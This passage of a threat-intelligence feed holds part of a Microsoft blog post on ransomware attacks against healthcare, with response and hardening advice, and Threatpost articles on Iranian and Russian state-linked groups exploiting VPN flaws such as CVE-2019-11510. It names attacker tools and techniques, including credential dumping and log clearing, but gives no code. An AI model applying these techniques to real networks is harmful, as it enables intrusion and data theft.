Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&amp;CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-09-01T21:47:35", "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). All three are exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently. ](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>)A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Register today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "cvss3": {}, "published": "2020-09-01T13:35:19", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-16T19:56:37", "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeted to coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail, to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail malware meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. \u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malwares uses hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is is perhaps best-known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.\n\nIt was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.\n\nIts history stretches back a few years though: It [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.\n\nResearchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations \u2013 an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is \u201calmost certainly part of the Russian intelligence services.\u201d\n\nWhile its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant\u2019s Hultquist.\n\n\u201cDespite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,\u201d he said via email. \u201cWhereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.\u201d\n\nThis latest case is no exception to that M.O., according to the advisory: \u201cAPT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,\u201d the agencies concluded.\n\nThat said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.\n\n\u201cAPT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,\u201d Michael Daly, CTO at Raytheon Intelligence &amp; Space, said via email. \u201cHowever, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations \u2013 the changing of hearts and minds to thwart and diminish the power of governments and organizations.\u201d\n\nHe added, \u201cIn the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed. The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.\u201d\n", "cvss3": {}, "published": "2020-07-16T18:05:20", "type": "threatpost", "title": "Hackers Look to Steal COVID-19 Vaccine Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670"], "modified": "2020-07-16T18:05:20", "id": "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "href": "https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-16T18:13:10", "description": "The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.\n\nAccording to the U.S. National Security Agency (NSA), which issued [an alert Thursday,](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/%20/#pop5008885>) the advanced persistent threat (APT) group [known as APT29](<https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/>) (a.k.a. Cozy Bear or The Dukes) is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.\u201d\n\nThe targets include U.S. and allied national-security and government networks, it added.\n\n[](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)\n\nJoin experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) to find out how cybercrime forums really work. FREE! Register by clicking above.\n\nThe five bugs under active attack are known, fixed security holes in platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware (detailed below) that organizations should patch immediately, researchers warned.\n\n\u201cSome of these vulnerabilities also have working Metasploit modules and are currently being widely exploited,\u201d said researchers with Cisco Talos, in a [related posting](<https://blog.talosintelligence.com/2021/04/nsa-svr-coverage.html#more>) on Thursday. \u201cPlease note that some of these vulnerabilities exploit applications leveraging SSL. This means that users should enable SSL decryption\u2026to detect exploitation of these vulnerabilities.\u201d\n\nThe NSA has linked APT29 to Russia\u2019s Foreign Intelligence Services (SVR). The news comes as the U.S. formally attributed the recent [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.\n\n## **The 5 Vulnerabilities Being Actively Exploited**\n\nAccording to the NSA, the following are under widespread attack in cyber-espionage efforts:\n\n * CVE-2018-13379 Fortinet FortiGate SSL VPN (path traversal)\n * CVE-2019-9670 Synacor Zimbra Collaboration Suite (XXE)\n * CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN (arbitrary file read)\n * CVE-2019-19781 Citrix Application Delivery Controller and Gateway (directory traversal)\n * CVE-2020-4006 VMware Workspace ONE Access (command injection)\n\n\u201cVulnerabilities in two VPN systems, two virtualization platforms and one collaboration solution seem to be a mighty combo,\u201d Dirk Schrader, global vice president of security research at New Net Technologies, told Threatpost. \u201cFour of them are 12 months or older, which is not a good sign for the overall cyber-hygiene in the U.S., given that all are either rated as severe or even critical in NIST\u2019s NVD. It looks like that adversaries can rely on the lack of diligence related to essential cybersecurity control, even more so in pandemic times.\u201d\n\n## **CVE-2018-13379**\n\nA directory traversal vulnerability in Fortinet FortOS allows unauthenticated attackers to access and download system files, by sending specially crafted HTTP resource requests. \u201cThis can result in the attacker obtaining VPN credentials, which could allow an initial foothold into a target network,\u201d according to Cisco Talos.\n\nThe NSA explained that it arises from an improper limitation of a pathname to a restricted directory. It affects Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12.\n\nThe nation-state issue is ongoing: Earlier in April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) APTs were actively exploiting the bug.\n\n## **CVE-2019-9670**\n\nThis bug is an XML External Entity Injection (XXE) vulnerability in the mailbox component of the Synacore Zimbra Collaboration Suite. Attackers can exploit it to gain access to credentials to further their access or as an initial foothold into a target network. It affects Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.\n\n## **CVE-2019-11510**\n\nIn Pulse Secure VPNs, a critical arbitrary file-reading flaw opens systems to exploitation from remote, unauthenticated attackers looking to gain access to a victim\u2019s networks. Attacker can send a specially crafted URI to trigger the exploit. It affects Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.\n\n\u201cThis can be abused by attackers to access sensitive information, including private keys and credentials,\u201d explained Cisco Talos researchers.\n\nLast April, the Department of Homeland Security (DHS) began urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN family.\n\nAt the time, DHS 